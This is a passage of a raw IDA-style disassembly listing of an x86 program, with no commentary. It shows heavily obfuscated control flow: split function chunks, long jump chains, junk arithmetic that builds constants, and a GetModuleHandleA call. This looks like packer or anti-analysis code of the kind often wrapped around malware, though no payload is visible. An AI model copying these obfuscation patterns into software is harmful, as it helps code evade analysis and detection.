; FUNCTION CHUNK AT 004264BC SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0042838D SIZE 00000005 BYTES
mov eax, [ebp+8]
test byte ptr [eax-10h], 38h
jnz loc_423F3D
mov eax, [ebp+8]
push eax
jmp loc_424ED3
sub_427D9D endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424631
loc_427DB3: ; CODE XREF: sub_424631:loc_424F09�j
jnz loc_423662
mov eax, [ebp+8]
push offset loc_425BA2
jmp loc_42839C
; END OF FUNCTION CHUNK FOR sub_424631
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_55. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42466E
loc_427DC7: ; CODE XREF: sub_42466E+A35�j
jmp loc_42424B
; END OF FUNCTION CHUNK FOR sub_42466E
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_120. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42855B
loc_427DCD: ; CODE XREF: sub_42855B+6�j
jmp sub_4230F2
; END OF FUNCTION CHUNK FOR sub_42855B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4237F4
loc_427DD2: ; CODE XREF: sub_4237F4:loc_426B24�j
pop ebp
mov eax, ds:dword_4233A4
or eax, eax
jnz loc_42680E
jmp loc_426B2F
; END OF FUNCTION CHUNK FOR sub_4237F4
; =============== S U B R O U T I N E =======================================
sub_427DE6 proc near ; CODE XREF: sub_427564-2F8A�j
; sub_427564:loc_426FE9�j
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00425F06 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00426449 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 004264B2 SIZE 00000005 BYTES
push ebx
push 98984D98h
pop ebx
and ebx, 6D900BAh
rol ebx, 1Ch
add ebx, 6AE0741Ah
xor ebx, 0EAE9D433h
xchg ebx, [esp+4+var_4]
jmp loc_425F06
sub_427DE6 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424EC9
loc_427E0A: ; CODE XREF: sub_424EC9:loc_4262D5�j
mov eax, ebx
xchg eax, [esp+0]
mov [ebp-4], eax
push 0DBABFA75h
pop eax
xor eax, 2DBE023Ah
add eax, 31B1A774h
or eax, ds:4000F3h
jmp loc_427298
; END OF FUNCTION CHUNK FOR sub_424EC9
; ---------------------------------------------------------------------------
loc_427E2F: ; DATA XREF: sub_4246DB+8�o
mov esp, ebp
pop ebp
mov eax, ds:dword_4233AC
or eax, eax
jmp loc_4261EC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427032
loc_427E3F: ; CODE XREF: sub_427032:loc_424491�j
mov edx, [ebp-8]
mov eax, [ebp-4]
loc_427E45: ; CODE XREF: sub_4263E3:loc_425056�j
call sub_426B29
call sub_424361
loc_427E4F: ; CODE XREF: sub_428E76+1C�j
jmp loc_426847
; END OF FUNCTION CHUNK FOR sub_427032
; =============== S U B R O U T I N E =======================================
sub_427E54 proc near ; DATA XREF: sub_428DDB+9�o
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 00423E31 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00424127 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00428EE5 SIZE 00000006 BYTES
cdq
add eax, [esp+0]
adc edx, [esp+arg_0]
add esp, 8
movzx eax, word ptr [eax]
shl eax, 2
jmp loc_424127
sub_427E54 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
sub ebx, 6BB8CAEFh
jmp loc_424816
; ---------------------------------------------------------------------------
locret_427E75: ; CODE XREF: hjohnhn9:0042672B�j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427C9B
loc_427E76: ; CODE XREF: sub_427C9B+84�j
jmp loc_423433
; END OF FUNCTION CHUNK FOR sub_427C9B
; =============== S U B R O U T I N E =======================================
sub_427E7B proc near ; CODE XREF: sub_424AE3+C�p
; FUNCTION CHUNK AT 00426C6F SIZE 00000005 BYTES
push offset dword_424E24
jmp loc_426C6F
sub_427E7B endp
; =============== S U B R O U T I N E =======================================
sub_427E85 proc near ; CODE XREF: hjohnhn9:004233CE�j
; sub_426F5A:loc_426BA8�p
; FUNCTION CHUNK AT 0042418D SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00426E75 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00427475 SIZE 0000000B BYTES
xchg eax, [esp+0]
pop eax
jz loc_427475
lea eax, [ebp-125h]
jmp loc_42418D
sub_427E85 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
mov ebx, eax
call sub_4275B2
; START OF FUNCTION CHUNK FOR sub_426475
loc_427EA1: ; CODE XREF: sub_426475-436�j
jmp loc_426E9B
; END OF FUNCTION CHUNK FOR sub_426475
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4235D8
loc_427EA6: ; CODE XREF: sub_4235D8+B�j
mov ds:dword_423940, eax
; END OF FUNCTION CHUNK FOR sub_4235D8
; START OF FUNCTION CHUNK FOR sub_4278EC
loc_427EAB: ; CODE XREF: hjohnhn9:loc_423C44�j
; sub_427A36-178B�j ...
js loc_42382E
cmp ds:dword_423944, 0
jnz loc_4243F7
push offset loc_423815
jmp nullsub_45
; END OF FUNCTION CHUNK FOR sub_4278EC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428271
loc_427EC8: ; CODE XREF: sub_428271:loc_4281AC�j
jnz loc_428EF2
mov eax, [ebp-14h]
mov eax, [eax+24h]
add eax, [ebp-4]
push offset sub_428DDB
jmp loc_427F5A
; END OF FUNCTION CHUNK FOR sub_428271
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_6. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423B05
loc_427EE2: ; CODE XREF: sub_423B05:loc_425E64�j
add ebp, 0CC738441h
add esi, 5BCE1CEAh
cmp edx, ecx
jmp loc_423648
; END OF FUNCTION CHUNK FOR sub_423B05
; ---------------------------------------------------------------------------
loc_427EF5: ; CODE XREF: hjohnhn9:00424CBA�j
jo loc_427085
; START OF FUNCTION CHUNK FOR sub_42851A
loc_427EFB: ; CODE XREF: sub_42851A-3617�j
add ebx, 7E1A2B03h
xchg ebx, [esp+0Ch+var_C]
jmp loc_424603
; END OF FUNCTION CHUNK FOR sub_42851A
; ---------------------------------------------------------------------------
loc_427F09: ; CODE XREF: hjohnhn9:loc_424941�j
xor edx, 0F82B8AEDh
push edx
; START OF FUNCTION CHUNK FOR sub_4263E3
loc_427F10: ; CODE XREF: sub_4263E3:loc_428A14�j
push esi
mov esi, eax
xchg esi, [esp+4+var_4]
call sub_42855B
call sub_4262C5
add esp, 10h
jmp loc_4265E9
; END OF FUNCTION CHUNK FOR sub_4263E3
; ---------------------------------------------------------------------------
sbb edx, 0F867FFC7h
jmp sub_428718
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42677F
loc_427F33: ; CODE XREF: sub_42677F:loc_423C56�j
mov edx, ecx
xchg edx, [esp+14h+var_14]
mov eax, esp
; END OF FUNCTION CHUNK FOR sub_42677F
; START OF FUNCTION CHUNK FOR sub_424819
loc_427F3A: ; CODE XREF: sub_424819+6�j
push 0
mov edx, esp
jmp loc_4272E4
; END OF FUNCTION CHUNK FOR sub_424819
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_427F43 proc near ; CODE XREF: sub_4262C5:loc_4251E6�j
retn
sub_427F43 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426638
loc_427F44: ; CODE XREF: sub_426638-352F�j
jmp loc_426139
; END OF FUNCTION CHUNK FOR sub_426638
; ---------------------------------------------------------------------------
loc_427F49: ; CODE XREF: hjohnhn9:0042301C�j
; hjohnhn9:004267A1�j
jmp loc_426B9C
; ---------------------------------------------------------------------------
loc_427F4E: ; CODE XREF: hjohnhn9:loc_427FE8�j
jz loc_428BA0
jmp loc_4273DD
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_45. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428271
loc_427F5A: ; CODE XREF: sub_428271-395�j
jmp nullsub_49
; END OF FUNCTION CHUNK FOR sub_428271
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426638
loc_427F5F: ; CODE XREF: sub_426638+B�j
jmp loc_4230FD
; END OF FUNCTION CHUNK FOR sub_426638
; ---------------------------------------------------------------------------
loc_427F64: ; CODE XREF: hjohnhn9:00428FE7�j
jz loc_42476D
jmp loc_423075
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_48. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4278DC
loc_427F70: ; CODE XREF: sub_4278DC+B�j
jmp loc_428FEC
; END OF FUNCTION CHUNK FOR sub_4278DC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424564
loc_427F75: ; CODE XREF: sub_424564+15�j
jmp loc_426402
; END OF FUNCTION CHUNK FOR sub_424564
; ---------------------------------------------------------------------------
ror ebp, 11h
jmp sub_424E5D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427852
loc_427F82: ; CODE XREF: sub_427852:loc_425156�j
dec dword ptr [ebp-1Ch]
jnz loc_426AA2
jmp loc_428883
; END OF FUNCTION CHUNK FOR sub_427852
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_427F90 proc near ; CODE XREF: sub_4278B9-44A1�p
; sub_4241F3+7�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0042440F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004275E4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00428496 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00428F6C SIZE 00000022 BYTES
push ebp
mov ebp, esp
add esp, 0FFFFFFF4h
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov [ebp+var_C], eax
jmp loc_4275E4
sub_427F90 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4231AD
loc_427FA4: ; CODE XREF: sub_4231AD:loc_4265C8�j
mov al, [ebp-5]
pop ecx
pop ecx
pop ebp
jmp loc_4249DC
; END OF FUNCTION CHUNK FOR sub_4231AD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4265CD
loc_427FAF: ; CODE XREF: sub_4265CD:loc_426B68�j
cmp ecx, 5E24A82Eh
loc_427FB5: ; CODE XREF: hjohnhn9:00424139�j
jmp loc_425D6F
; END OF FUNCTION CHUNK FOR sub_4265CD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4284CB
loc_427FBA: ; CODE XREF: sub_4284CB:loc_425B97�j
call nullsub_5
loc_427FBF: ; CODE XREF: sub_4240E6+B�j
; sub_428ABB+7�j
mov eax, ds:dword_426E3C
call sub_427A58
loc_427FC9: ; CODE XREF: sub_424564+1EC4�j
jmp loc_426559
; END OF FUNCTION CHUNK FOR sub_4284CB
; =============== S U B R O U T I N E =======================================
sub_427FCE proc near ; CODE XREF: sub_424A78:loc_427800�j
push ebp
mov eax, [ebp-20h]
call sub_423B6C
pop ecx
jmp loc_4241DB
sub_427FCE endp
; =============== S U B R O U T I N E =======================================
sub_427FDD proc near ; DATA XREF: sub_4263E3:loc_4290A8�o
push eax
ror eax, 0Eh
mov ds:dword_42339C, eax
retn
sub_427FDD endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_427FE8: ; CODE XREF: hjohnhn9:004236DF�j
jmp loc_427F4E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4263E3
loc_427FED: ; CODE XREF: sub_4263E3+8�j
rol eax, 0Eh
jmp loc_4250A8
; END OF FUNCTION CHUNK FOR sub_4263E3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4279C0
loc_427FF5: ; CODE XREF: sub_4279C0-15FE�j
mov al, 1
pop edx
call edx ; GetModuleHandleA
xor eax, eax
mov [ebp+var_4], eax
jmp loc_4279A9
; END OF FUNCTION CHUNK FOR sub_4279C0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427486
loc_428004: ; CODE XREF: sub_427486:loc_427921�j
; hjohnhn9:00427942�j
xor edx, 0B78BAB96h
push eax
pushf
push 795F89B4h
pop eax
sub eax, 0C50DC6EFh
and eax, 1CB6C470h
rol eax, 1Eh
jmp loc_42721D
; END OF FUNCTION CHUNK FOR sub_427486
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_93. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423AAF
loc_428027: ; CODE XREF: sub_423AAF+C15�j
jmp sub_424877
; END OF FUNCTION CHUNK FOR sub_423AAF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4245BA
loc_42802C: ; CODE XREF: sub_4245BA+13�j
jmp nullsub_47
; END OF FUNCTION CHUNK FOR sub_4245BA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4262C5
loc_428031: ; CODE XREF: sub_4262C5+33A�j
jnz loc_4264E6
add ecx, edi
add eax, 699293F1h
cmp ebp, 0C0F19894h
jmp loc_423C0D
; END OF FUNCTION CHUNK FOR sub_4262C5
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426E8C
loc_42804B: ; CODE XREF: sub_426E8C-25A0�j
jmp loc_426852
; END OF FUNCTION CHUNK FOR sub_426E8C
; ---------------------------------------------------------------------------
loc_428050: ; CODE XREF: hjohnhn9:00423510�j
push eax
mov eax, ebp
xchg eax, [esp]
mov ebp, esp
push ecx
jmp loc_423E01
; ---------------------------------------------------------------------------
loc_42805E: ; DATA XREF: sub_428ABB+D�o
lea edx, [ebp-14h]
mov eax, offset dword_426E40
call sub_427AEB
lea eax, [ebp-14h]
push eax
loc_42806F: ; CODE XREF: hjohnhn9:loc_428515�j
call sub_427A36
jmp loc_4284D4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42304F
loc_428079: ; CODE XREF: sub_42304F+11E4�j
call sub_428D1E
loc_42807E: ; CODE XREF: sub_4290CF+A�j
mov eax, [ebp-14h]
mov eax, [eax+24h]
add eax, [ebp-4]
xor edx, edx
push edx
jmp loc_424A33
; END OF FUNCTION CHUNK FOR sub_42304F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4278DC
loc_42808F: ; CODE XREF: sub_4278DC+1727�j
jnz loc_42515B
jmp loc_424BA3
; ---------------------------------------------------------------------------
loc_42809A: ; CODE XREF: sub_4278DC-3542�j
xor esi, 0FED4AF4Dh
add esi, 637C60D5h
xchg esi, [esp+4+var_4]
jmp sub_4244F5
; END OF FUNCTION CHUNK FOR sub_4278DC
; ---------------------------------------------------------------------------
loc_4280AE: ; CODE XREF: hjohnhn9:00424444�j
; hjohnhn9:loc_42487D�j
jnb loc_427266
sbb ebp, 0E6C0B23Ch
jmp sub_427324
; ---------------------------------------------------------------------------
loc_4280BF: ; DATA XREF: sub_4240E6:loc_42744E�o
mov eax, offset dword_426E40
call sub_427AEB
lea eax, [ebp-14h]
push eax
jmp loc_428515
; =============== S U B R O U T I N E =======================================
sub_4280D2 proc near ; CODE XREF: hjohnhn9:00424FD8�j
; sub_426475-8F4�p
arg_0 = dword ptr 4
xchg esi, [esp+0]
pop esi
xchg ecx, [esp-4+arg_0]
jmp sub_424AAE
sub_4280D2 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
push esi
push 7AA4790Dh
pop esi
and esi, 0C25CDF42h
test esi, 80000000h
jmp loc_423265
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428271
loc_4280F6: ; CODE XREF: sub_428271:loc_42350B�j
adc edx, [esp+arg_0]
add esp, 8
mov eax, [eax]
add eax, [ebp-4]
call sub_427F90
cmp eax, [ebp-8]
jmp loc_4281AC
; END OF FUNCTION CHUNK FOR sub_428271
; ---------------------------------------------------------------------------
jbe loc_4247F8
jmp sub_428C4E
; ---------------------------------------------------------------------------
mov edx, 0A1E8B87Bh
jmp sub_427994
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424631
loc_428124: ; CODE XREF: sub_424631+14�j
call sub_428788
loc_428129: ; CODE XREF: sub_425DE4+9�j
pop eax
rol eax, 1
sub eax, ds:4000F0h
add eax, 19868220h
mov eax, [eax]
or eax, eax
jnz loc_423B9C
jmp loc_425B0E
; END OF FUNCTION CHUNK FOR sub_424631
; ---------------------------------------------------------------------------
add edx, ebx
mov [edx], ebx
jmp sub_4281B9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426F85
loc_428150: ; CODE XREF: sub_426F85:loc_42726D�j
test eax, eax
jl loc_428EEB
push offset loc_426A97
jmp nullsub_82
; END OF FUNCTION CHUNK FOR sub_426F85
; =============== S U B R O U T I N E =======================================
sub_428162 proc near ; CODE XREF: sub_4241D2+4�p
; hjohnhn9:00428A66�j
xchg esi, [esp+0]
pop esi
call sub_424698
pop ecx
mov [ebp-20h], eax
jmp loc_424C37
sub_428162 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427B51
loc_428174: ; CODE XREF: sub_427B51:loc_427B58�j
test byte ptr [ebp-8], 2
jz loc_424C37
jmp sub_4234CA
; END OF FUNCTION CHUNK FOR sub_427B51
; =============== S U B R O U T I N E =======================================
sub_428183 proc near ; DATA XREF: sub_428183-4E3D�o
; FUNCTION CHUNK AT 0042332F SIZE 00000021 BYTES
; FUNCTION CHUNK AT 0042335C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00424EAA SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00428B11 SIZE 00000005 BYTES
pop eax
cmp dword ptr [eax], 0
jnz loc_424EAA
jmp sub_427C43
sub_428183 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_428192 proc near ; CODE XREF: sub_428183-4E42�p
; hjohnhn9:loc_4239E7�j ...
; FUNCTION CHUNK AT 004247CF SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00428253 SIZE 0000000A BYTES
jnb loc_428253
push ebp
mov ebp, esp
mov esp, ebp
jmp loc_4247CF
sub_428192 endp
; ---------------------------------------------------------------------------
loc_4281A2: ; DATA XREF: sub_428477-4A9B�o
pop ecx
; START OF FUNCTION CHUNK FOR sub_425BF2
loc_4281A3: ; CODE XREF: sub_425BF2:loc_4290C9�j
xchg esi, [esp-8+arg_4]
mov ebp, esi
pop esi
retn 0Ch
; END OF FUNCTION CHUNK FOR sub_425BF2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428271
loc_4281AC: ; CODE XREF: sub_428271-167�j
jmp loc_427EC8
; END OF FUNCTION CHUNK FOR sub_428271
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_124. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
xchg edi, esi
jmp sub_42636C
; =============== S U B R O U T I N E =======================================
sub_4281B9 proc near ; CODE XREF: sub_424631+37F�p
; hjohnhn9:0042814B�j
xchg ebx, [esp+0]
pop ebx
jnz loc_423F3D
mov eax, [ebp+8]
push eax
mov eax, [ebp+8]
push offset loc_428DC2
jmp nullsub_48
sub_4281B9 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_4281D4: ; CODE XREF: hjohnhn9:00425FD7�j
jnz near ptr dword_4236FC+14h
jmp loc_426D46
; ---------------------------------------------------------------------------
jnp loc_426889
jmp loc_424A75
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424946
loc_4281EA: ; CODE XREF: sub_424946:loc_429018�j
pop ebx
add eax, edx
push esi
push 2E2B81F4h
jmp loc_42898A
; END OF FUNCTION CHUNK FOR sub_424946
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426749
loc_4281F8: ; CODE XREF: sub_426749+2717�j
call sub_427AEB
lea eax, [ebp-14h]
push eax
call sub_427A36
mov ds:dword_426E6C, eax
mov ds:byte_426E54, 1
lea eax, [ebp-14h]
jmp loc_42373A
; END OF FUNCTION CHUNK FOR sub_426749
; ---------------------------------------------------------------------------
loc_42821A: ; DATA XREF: sub_4249BF+3�o
xchg ebx, [esp]
mov ebp, esp
push ecx
mov esp, ebp
xchg esi, [esp]
mov ebp, esi
jmp loc_425B57
; ---------------------------------------------------------------------------
loc_42822C: ; CODE XREF: hjohnhn9:004230B7�j
jg loc_426BEA
test ebp, edx
jmp loc_425EB4
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_14. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_42823A: ; CODE XREF: hjohnhn9:004285BC�j
jmp loc_4268F8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427852
loc_42823F: ; CODE XREF: sub_427852+AE0�j
jmp loc_424064
; END OF FUNCTION CHUNK FOR sub_427852
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425029
loc_428244: ; CODE XREF: sub_425029+1D�j
jmp loc_428999
; END OF FUNCTION CHUNK FOR sub_425029
; =============== S U B R O U T I N E =======================================
sub_428249 proc near ; CODE XREF: sub_4248B1+15�p
; hjohnhn9:00426B7B�j
; FUNCTION CHUNK AT 00427632 SIZE 00000005 BYTES
xchg edx, [esp+0]
pop edx
push eax
jmp loc_427632
sub_428249 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428192
loc_428253: ; CODE XREF: sub_428192�j
push offset sub_42870E
jmp nullsub_110
; END OF FUNCTION CHUNK FOR sub_428192
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427564
loc_42825D: ; CODE XREF: sub_427564:loc_42901D�j
add ecx, ebp
add ecx, 268E381Eh
mov [ecx], eax
xchg esi, [esp+0]
mov ecx, esi
call sub_425EEA
; END OF FUNCTION CHUNK FOR sub_427564
; =============== S U B R O U T I N E =======================================
sub_428271 proc near ; CODE XREF: hjohnhn9:00426AF1�j
; sub_427852+16C9�p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 0042350B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00424073 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00426B80 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00427EC8 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00427F5A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004280F6 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 004281AC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004286E6 SIZE 0000000B BYTES
xchg edx, [esp+0]
pop edx
push edx
push eax
mov eax, [ebp-18h]
jmp loc_426B80
sub_428271 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42345B
loc_42827F: ; CODE XREF: sub_42345B+50E2�j
xchg edi, [esp+8+var_8]
jmp nullsub_2
; END OF FUNCTION CHUNK FOR sub_42345B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423F65
loc_428287: ; CODE XREF: sub_423F65:loc_427550�j
add eax, ebp
add eax, 50FF1F19h
mov eax, [eax]
call sub_424C5F
retn
; END OF FUNCTION CHUNK FOR sub_423F65
; ---------------------------------------------------------------------------
locret_428297: ; CODE XREF: hjohnhn9:0042408E�j
retn
; ---------------------------------------------------------------------------
pushf
jmp sub_4241F3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424B97
loc_42829E: ; CODE XREF: sub_424B97:loc_424EBE�j
pop edx
push edx
push 0FF748C5Ah
pop edx
and edx, 7188AD6Ch
sub edx, 9D9846B5h
js loc_427420
adc ebx, 5158AB9h
jmp loc_42741C
; END OF FUNCTION CHUNK FOR sub_424B97
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_75. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424819
loc_4282C4: ; CODE XREF: sub_424819+2AD9�j
jmp loc_424013
; END OF FUNCTION CHUNK FOR sub_424819
; ---------------------------------------------------------------------------
loc_4282C9: ; CODE XREF: hjohnhn9:0042720E�j
jmp loc_4269D9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4278B9
loc_4282CE: ; CODE XREF: sub_4278B9-4499�j
jmp loc_4267FC
; END OF FUNCTION CHUNK FOR sub_4278B9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42304F
loc_4282D3: ; CODE XREF: sub_42304F+19�j
jmp loc_42781A
; END OF FUNCTION CHUNK FOR sub_42304F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423425
loc_4282D8: ; CODE XREF: sub_423425:loc_4278D7�j
push ecx
push offset loc_423A05
jmp nullsub_51
; END OF FUNCTION CHUNK FOR sub_423425
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_26. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4260BD
loc_4282E4: ; CODE XREF: sub_4260BD:loc_426E4D�j
jz loc_42794A
jmp loc_427714
; END OF FUNCTION CHUNK FOR sub_4260BD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424A78
loc_4282EF: ; CODE XREF: sub_424A78:loc_4248CB�j
pop ecx
mov [ebp-20h], eax
jmp loc_4242D9
; END OF FUNCTION CHUNK FOR sub_424A78
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4282F8 proc near ; CODE XREF: sub_424A78+2175�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 004247D9 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 00425BC8 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00426189 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00426A5D SIZE 00000005 BYTES
push ebp
mov ebp, esp
add esp, 0FFFFFFF4h
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
jmp loc_4247D9
sub_4282F8 endp
; =============== S U B R O U T I N E =======================================
sub_428309 proc near ; CODE XREF: hjohnhn9:00424A02�j
; sub_42897B+A�p
; FUNCTION CHUNK AT 0042491D SIZE 00000005 BYTES
xchg edi, [esp+0]
pop edi
mov esp, ebp
push offset loc_426561
jmp loc_42491D
sub_428309 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427852
loc_428319: ; CODE XREF: sub_427852:loc_425F3A�j
add esp, 8
mov eax, [eax]
add eax, [ebp-4]
call sub_427F90
loc_428326: ; CODE XREF: sub_424161+423�j
cmp eax, [ebp-8]
jnz loc_428EF2
mov eax, [ebp-14h]
jmp loc_42823F
; END OF FUNCTION CHUNK FOR sub_427852
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4260BD
loc_428337: ; CODE XREF: sub_4260BD-2014�j
mov esi, 7CAB0713h
loc_42833C: ; CODE XREF: sub_4260BD:loc_42409B�j
xor ebx, 81F09744h
add ebx, ebp
add ebx, 0B28572C8h
mov [ebx], eax
jmp loc_42497B
; END OF FUNCTION CHUNK FOR sub_4260BD
; ---------------------------------------------------------------------------
loc_428351: ; CODE XREF: hjohnhn9:00423C34�j
jnb loc_42465A
; =============== S U B R O U T I N E =======================================
sub_428357 proc near ; CODE XREF: sub_42865B+7�p
; FUNCTION CHUNK AT 004232C8 SIZE 00000009 BYTES
xchg eax, [esp+0]
pop eax
shr eax, 0Bh
jmp loc_4232C8
sub_428357 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_428363: ; CODE XREF: hjohnhn9:loc_428EC5�j
call near ptr dword_4236FC+32h
loc_428368: ; CODE XREF: hjohnhn9:00427C87�j
jmp loc_429094
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42486B
loc_42836D: ; CODE XREF: sub_42486B+7�j
jmp loc_428F71
; END OF FUNCTION CHUNK FOR sub_42486B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42325E
loc_428372: ; CODE XREF: sub_42325E:loc_423E01�j
mov esp, ebp
pop ebp
push 7178371Ch
pop eax
jmp loc_423E36
; END OF FUNCTION CHUNK FOR sub_42325E
; ---------------------------------------------------------------------------
dword_428380 dd 0 ; DATA XREF: sub_4264FA+D�w
dword_428384 dd 0 ; DATA XREF: sub_42851A-1D4D�r
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426354
loc_428388: ; CODE XREF: sub_426354-48�j
jmp loc_425C05
; END OF FUNCTION CHUNK FOR sub_426354
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427D9D
loc_42838D: ; CODE XREF: sub_427D9D:loc_424EEC�j
jmp loc_4264BC
; END OF FUNCTION CHUNK FOR sub_427D9D
; ---------------------------------------------------------------------------
dw 89D4h
dword_428394 dd 0 ; DATA XREF: hjohnhn9:00425B58�r
; sub_425D27+A�w
dword_428398 dd 0 ; DATA XREF: sub_423B05+7�r
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424631
loc_42839C: ; CODE XREF: sub_424631+3790�j
jmp nullsub_54
